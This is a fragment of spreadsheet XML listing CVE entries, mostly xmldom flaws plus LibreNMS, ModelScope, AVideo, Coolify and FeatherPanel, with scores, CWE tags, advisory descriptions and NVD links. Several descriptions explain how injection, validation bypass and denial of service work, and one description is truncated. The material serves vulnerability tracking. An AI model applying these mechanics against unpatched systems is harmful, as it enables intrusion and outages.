          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83606</t>
        </is>
      </c>
    </row>
    <row r="1267">
      <c r="A1267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83607</t>
        </is>
      </c>
      <c r="C1267" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1267" s="5" t="inlineStr"/>
      <c r="F1267" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1267" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1267" s="5" t="inlineStr"/>
      <c r="I1267" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1267" s="5" t="inlineStr"/>
      <c r="K1267" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L1267" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.14 and 0.9.11, and in xmldom version 0.6.0 and earlier, Document.createElement(tagName) stores an unvalidated element name and XMLSerializer.serializeToString() emits that name verbatim. The requireWellFormed: true path did not validate the element qualified name or synthesized xmlns:PREFIX declaration, so attacker-controlled tag names could inject attributes, elements, or processing instructions into serialized XML or HTML and could cause cross-site scripting when browser-consumed. The unchecked values violate the XML QName constraint, and default serialization and creation-time createElement() behavior remain permissive. This issue is fixed in @xmldom/xmldom versions 0.8.14 and 0.9.11; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M1267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83607</t>
        </is>
      </c>
    </row>
    <row r="1268">
      <c r="A1268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83608</t>
        </is>
      </c>
      <c r="C1268" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1268" s="5" t="inlineStr"/>
      <c r="F1268" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1268" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1268" s="5" t="inlineStr"/>
      <c r="I1268" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1268" s="5" t="inlineStr"/>
      <c r="K1268" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L1268" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, the DOCUMENT_TYPE_NODE branch in lib/dom.js validates publicId, systemId, and internalSubset under requireWellFormed: true but emits DocumentType.name verbatim. A name containing &gt; or whitespace can terminate the &lt;!DOCTYPE ...&gt; declaration and inject sibling markup; the value can be supplied through createDocumentType() on the 0.8.x and unscoped lines or through a direct DocumentType.name property write on every affected line. The default path and legacy creation-time behavior remain permissive, while the vulnerable strict path fails to enforce an XML Name. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M1268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83608</t>
        </is>
      </c>
    </row>
    <row r="1269">
      <c r="A1269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83609</t>
        </is>
      </c>
      <c r="C1269" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1269" s="5" t="inlineStr"/>
      <c r="F1269" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1269" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1269" s="5" t="inlineStr"/>
      <c r="I1269" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1269" s="5" t="inlineStr"/>
      <c r="K1269" s="5" t="inlineStr">
        <is>
          <t>CWE-625, CWE-91</t>
        </is>
      </c>
      <c r="L1269" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.0 until 0.9.12, the shared reg() builder in lib/grammar.js compiles the anchored QName_exact validator with the multiline flag, so ^ and $ validate only one line instead of the complete name. createElementNS, createAttributeNS, createDocumentType, and createAttribute consequently accept a malformed XML name whose first line is valid and whose later text injects markup when serialized through either the default path or requireWellFormed: true. The triggering ECMAScript line terminators are U+000A, U+000D, U+2028, and U+2029. This issue is fixed in @xmldom/xmldom version 0.9.12.</t>
        </is>
      </c>
      <c r="M1269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83609</t>
        </is>
      </c>
    </row>
    <row r="1270">
      <c r="A1270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83612</t>
        </is>
      </c>
      <c r="C1270" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1270" s="5" t="inlineStr"/>
      <c r="F1270" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1270" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1270" s="5" t="inlineStr"/>
      <c r="I1270" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1270" s="5" t="inlineStr"/>
      <c r="K1270" s="5" t="inlineStr">
        <is>
          <t>CWE-178, CWE-400</t>
        </is>
      </c>
      <c r="L1270" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.0-beta.1 until 0.9.12, HTML-mode parsing through DOMParser.parseFromString() mishandles a mixed-case closing tag for the script, style, textarea, or title raw-text elements. parseHtmlSpecialContent, selected by isHTMLRawTextElement or isHTMLEscapableRawTextElement, uses a case-sensitive indexOf() and then calls substring() with a missing-close result of negative one, causing unstable parser progression and quadratic output amplification. A small untrusted text/html document can consequently consume disproportionate CPU and memory when parsed and serialized. This issue is fixed in @xmldom/xmldom version 0.9.12.</t>
        </is>
      </c>
      <c r="M1270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83612</t>
        </is>
      </c>
    </row>
    <row r="1271">
      <c r="A1271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83613</t>
        </is>
      </c>
      <c r="C1271" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1271" s="5" t="inlineStr"/>
      <c r="F1271" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1271" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H1271" s="5" t="inlineStr"/>
      <c r="I1271" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1271" s="5" t="inlineStr"/>
      <c r="K1271" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1271" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, DOMHandler.startElement in lib/dom-parser.js inserts every parsed attribute through setAttributeNode, while NamedNodeMap.setNamedItem in lib/dom.js calls the linear getNamedItem or getNamedItemNS lookup for each insertion. A well-formed element with many distinct attributes therefore requires quadratic comparisons during DOMParser.parseFromString() and can stall a Node.js event loop before application validation. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M1271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83613</t>
        </is>
      </c>
    </row>
    <row r="1272">
      <c r="A1272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83614</t>
        </is>
      </c>
      <c r="C1272" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1272" s="5" t="inlineStr"/>
      <c r="F1272" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1272" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1272" s="5" t="inlineStr"/>
      <c r="I1272" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1272" s="5" t="inlineStr"/>
      <c r="K1272" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="L1272" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom versions 0.3.0 through 0.6.0, two independent quadratic paths can cause denial of service. In lib/sax.js, parseElementStartPart repeatedly rescans a malformed tag name to the next &gt; during single-character recovery; in lib/dom.js, normalize() repeatedly removes and appends adjacent text nodes, causing quadratic reindexing and string rebuilding. The first path is reachable through default DOMParser.parseFromString() processing, while the second is also reachable through a direct normalize() call on a programmatically constructed DOM, and endDocument invokes that normalization after parsing. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M1272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83614</t>
        </is>
      </c>
    </row>
    <row r="1273">
      <c r="A1273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83615</t>
        </is>
      </c>
      <c r="C1273" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1273" s="5" t="inlineStr"/>
      <c r="F1273" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1273" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1273" s="5" t="inlineStr"/>
      <c r="I1273" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1273" s="5" t="inlineStr"/>
      <c r="K1273" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1273" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom versions 0.1.5 through 0.6.0, appendElement in lib/sax.js uses _copy to clone the complete currentNSMap for each nested element that declares a new namespace prefix. Keeping every ancestor map live on the parse stack creates quadratic peak namespace-map storage, so a small highly compressible XML document can exhaust the process heap before application validation. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M1273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83615</t>
        </is>
      </c>
    </row>
    <row r="1274">
      <c r="A1274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83616</t>
        </is>
      </c>
      <c r="C1274" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1274" s="5" t="inlineStr"/>
      <c r="F1274" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1274" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1274" s="5" t="inlineStr"/>
      <c r="I1274" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1274" s="5" t="inlineStr"/>
      <c r="K1274" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L1274" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, Document.createProcessingInstruction(target, data) in lib/dom.js accepts an unvalidated target, while the requireWellFormed: true serializer checks only for a colon and the reserved case-insensitive xml name on 0.9.x and performs no target check on 0.8.x. Because serialization emits &lt;?target data?&gt;, a target containing &gt;, ?, whitespace, or another invalid XML-name character can break the processing-instruction boundary and inject XML structure. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M1274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83616</t>
        </is>
      </c>
    </row>
    <row r="1275">
      <c r="A1275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83617</t>
        </is>
      </c>
      <c r="C1275" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1275" s="5" t="inlineStr"/>
      <c r="F1275" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1275" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1275" s="5" t="inlineStr"/>
      <c r="I1275" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1275" s="5" t="inlineStr"/>
      <c r="K1275" s="5" t="inlineStr">
        <is>
          <t>CWE-625, CWE-91</t>
        </is>
      </c>
      <c r="L1275" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.11 until 0.9.12, the requireWellFormed: true element and attribute name checks use the anchored QName_exact expression produced by reg() in lib/grammar.js, which inherits the multiline flag. A name with a valid first line followed by U+000A, U+000D, U+2028, or U+2029 and breakout markup therefore passes validation and is emitted verbatim in element start and end tags or attribute names. This bypasses the strict-serialization checks introduced for the earlier element-name and attribute-name injection advisories, while the default serialization path remains outside the strict guarantee. This issue is fixed in @xmldom/xmldom version 0.9.12.</t>
        </is>
      </c>
      <c r="M1275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83617</t>
        </is>
      </c>
    </row>
    <row r="1276">
      <c r="A1276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83618</t>
        </is>
      </c>
      <c r="C1276" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1276" s="5" t="inlineStr"/>
      <c r="F1276" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1276" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1276" s="5" t="inlineStr"/>
      <c r="I1276" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1276" s="5" t="inlineStr"/>
      <c r="K1276" s="5" t="inlineStr">
        <is>
          <t>CWE-625, CWE-91</t>
        </is>
      </c>
      <c r="L1276" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.10 until 0.9.12, the requireWellFormed: true serializer validates DocumentType.publicId and DocumentType.systemId with PubidLiteral_match and SystemLiteral_match expressions produced by reg() in lib/grammar.js, which inherit the multiline flag. A complete valid literal on the first line can therefore satisfy the matcher while U+000A, U+000D, U+2028, or U+2029 and breakout markup remain in the emitted &lt;!DOCTYPE ...&gt; declaration. This bypasses the strict-serialization mitigation for the earlier DocumentType injection advisory; creation and direct property assignment remain unvalidated by design. This issue is fixed in @xmldom/xmldom version 0.9.12.</t>
        </is>
      </c>
      <c r="M1276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83618</t>
        </is>
      </c>
    </row>
    <row r="1277">
      <c r="A1277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83619</t>
        </is>
      </c>
      <c r="C1277" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1277" s="5" t="inlineStr"/>
      <c r="F1277" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1277" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H1277" s="5" t="inlineStr"/>
      <c r="I1277" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1277" s="5" t="inlineStr"/>
      <c r="K1277" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L1277" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.7.0 until 0.8.15, the release-0.8.x parser in lib/sax.js trims captured end-tag names with the unanchored global expression /[ \t\n\r]+$/g. For an end tag containing a long whitespace run followed by a non-whitespace character, the expression retries from each possible starting position and backtracks quadratically before failing its end anchor. DOMParser.parseFromString() reaches the path under default options, allowing a small unauthenticated XML input to stall the Node.js event loop; the 0.9.x and unscoped npm lines do not contain this expression. This issue is fixed in @xmldom/xmldom version 0.8.15.</t>
        </is>
      </c>
      <c r="M1277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83619</t>
        </is>
      </c>
    </row>
    <row r="1278">
      <c r="A1278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84190</t>
        </is>
      </c>
      <c r="C1278" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1278" s="5" t="inlineStr"/>
      <c r="F1278" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1278" s="5" t="inlineStr"/>
      <c r="H1278" s="5" t="inlineStr"/>
      <c r="I1278" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1278" s="5" t="inlineStr"/>
      <c r="K1278" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1278" s="5" t="inlineStr">
        <is>
          <t>LibreNMS versions before 26.5.0 contain a remote code execution vulnerability in the AboutController where the snmpget configuration parameter is passed to shell_exec() without proper validation. An authenticated administrator can modify the snmpget configuration to point to a malicious executable file and trigger code execution by accessing the /about endpoint.</t>
        </is>
      </c>
      <c r="M1278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84190</t>
        </is>
      </c>
    </row>
    <row r="1279">
      <c r="A1279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84202</t>
        </is>
      </c>
      <c r="C1279" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1279" s="5" t="inlineStr"/>
      <c r="F1279" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1279" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1279" s="5" t="inlineStr"/>
      <c r="I1279" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1279" s="5" t="inlineStr"/>
      <c r="K1279" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1279" s="5" t="inlineStr">
        <is>
          <t>ModelScope uses PyYAML's unsafe yaml.Loader to parse model configuration files, allowing arbitrary code execution through Python object construction tags. Attackers can craft malicious model repositories with poisoned configuration files that execute code when loaded by users.</t>
        </is>
      </c>
      <c r="M1279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84202</t>
        </is>
      </c>
    </row>
    <row r="1280">
      <c r="A1280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84208</t>
        </is>
      </c>
      <c r="C1280" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1280" s="5" t="inlineStr"/>
      <c r="F1280" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1280" s="5" t="inlineStr"/>
      <c r="H1280" s="5" t="inlineStr"/>
      <c r="I1280" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1280" s="5" t="inlineStr"/>
      <c r="K1280" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1280" s="5" t="inlineStr">
        <is>
          <t>AVideo through version 29.0 contains an unauthenticated SQL injection vulnerability in the User_Location plugin's regions.json.php and cities.json.php endpoints. The country and region GET parameters are passed directly into SQL queries without escaping or prepared statement binding, allowing unauthenticated attackers to execute UNION-based SQL injection to read arbitrary database contents including password hashes and sensitive data.</t>
        </is>
      </c>
      <c r="M1280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84208</t>
        </is>
      </c>
    </row>
    <row r="1281">
      <c r="A1281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84304</t>
        </is>
      </c>
      <c r="C1281" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1281" s="5" t="inlineStr"/>
      <c r="F1281" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1281" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1281" s="5" t="inlineStr"/>
      <c r="I1281" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1281" s="5" t="inlineStr"/>
      <c r="K1281" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1281" s="5" t="inlineStr">
        <is>
          <t>gRPC-Go is</t>
        </is>
      </c>
      <c r="M1281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84304</t>
        </is>
      </c>
    </row>
    <row r="1282">
      <c r="A1282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84476</t>
        </is>
      </c>
      <c r="C1282" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1282" s="5" t="inlineStr"/>
      <c r="F1282" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1282" s="5" t="inlineStr"/>
      <c r="H1282" s="5" t="inlineStr"/>
      <c r="I1282" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1282" s="5" t="inlineStr"/>
      <c r="K1282" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L1282" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo fails to validate trusted proxies before accepting X-Real-IP and X-Forwarded-For headers, allowing attackers to spoof the client address used by enforceRateLimit(). Attackers can rotate the header value per request to bypass login rate limiting and perform unlimited credential guessing attacks.</t>
        </is>
      </c>
      <c r="M1282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84476</t>
        </is>
      </c>
    </row>
    <row r="1283">
      <c r="A1283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84482</t>
        </is>
      </c>
      <c r="C1283" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1283" s="5" t="inlineStr"/>
      <c r="F1283" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1283" s="5" t="inlineStr"/>
      <c r="H1283" s="5" t="inlineStr"/>
      <c r="I1283" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1283" s="5" t="inlineStr"/>
      <c r="K1283" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L1283" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit 9c39d8c8 contains a cross-site request forgery vulnerability in the get_domain() and isSameDomain() functions that fail to properly validate referer origins. Attackers can forge requests from sibling subdomains or unparseable long-gTLD origins to perform administrative ObjectYPT writes including live server configuration changes.</t>
        </is>
      </c>
      <c r="M1283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84482</t>
        </is>
      </c>
    </row>
    <row r="1284">
      <c r="A1284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84694</t>
        </is>
      </c>
      <c r="C1284" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1284" s="5" t="inlineStr"/>
      <c r="F1284" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1284" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1284" s="5" t="inlineStr"/>
      <c r="I1284" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1284" s="5" t="inlineStr"/>
      <c r="K1284" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1284" s="5" t="inlineStr">
        <is>
          <t>Coolify before 4.2.0 fails to properly escape environment variable key names in Docker commands executed over SSH on managed servers. Authenticated attackers can inject shell metacharacters into environment variable keys to execute arbitrary commands on the server host outside containers.</t>
        </is>
      </c>
      <c r="M1284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84694</t>
        </is>
      </c>
    </row>
    <row r="1285">
      <c r="A1285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84715</t>
        </is>
      </c>
      <c r="C1285" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1285" s="5" t="inlineStr"/>
      <c r="F1285" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1285" s="5" t="inlineStr"/>
      <c r="H1285" s="5" t="inlineStr"/>
      <c r="I1285" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1285" s="5" t="inlineStr"/>
      <c r="K1285" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1285" s="5" t="inlineStr">
        <is>
          <t>FeatherPanel versions before 1.3.7.10 fail to validate permissions in the SubuserController updateSubuser handler, allowing authenticated subusers to modify their own permission records. A subuser with minimal permissions can send a crafted request to grant themselves full server control, enabling unauthorized access to sensitive data, backups, and server configuration.</t>
        </is>
      </c>
      <c r="M1285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84715</t>
        </is>
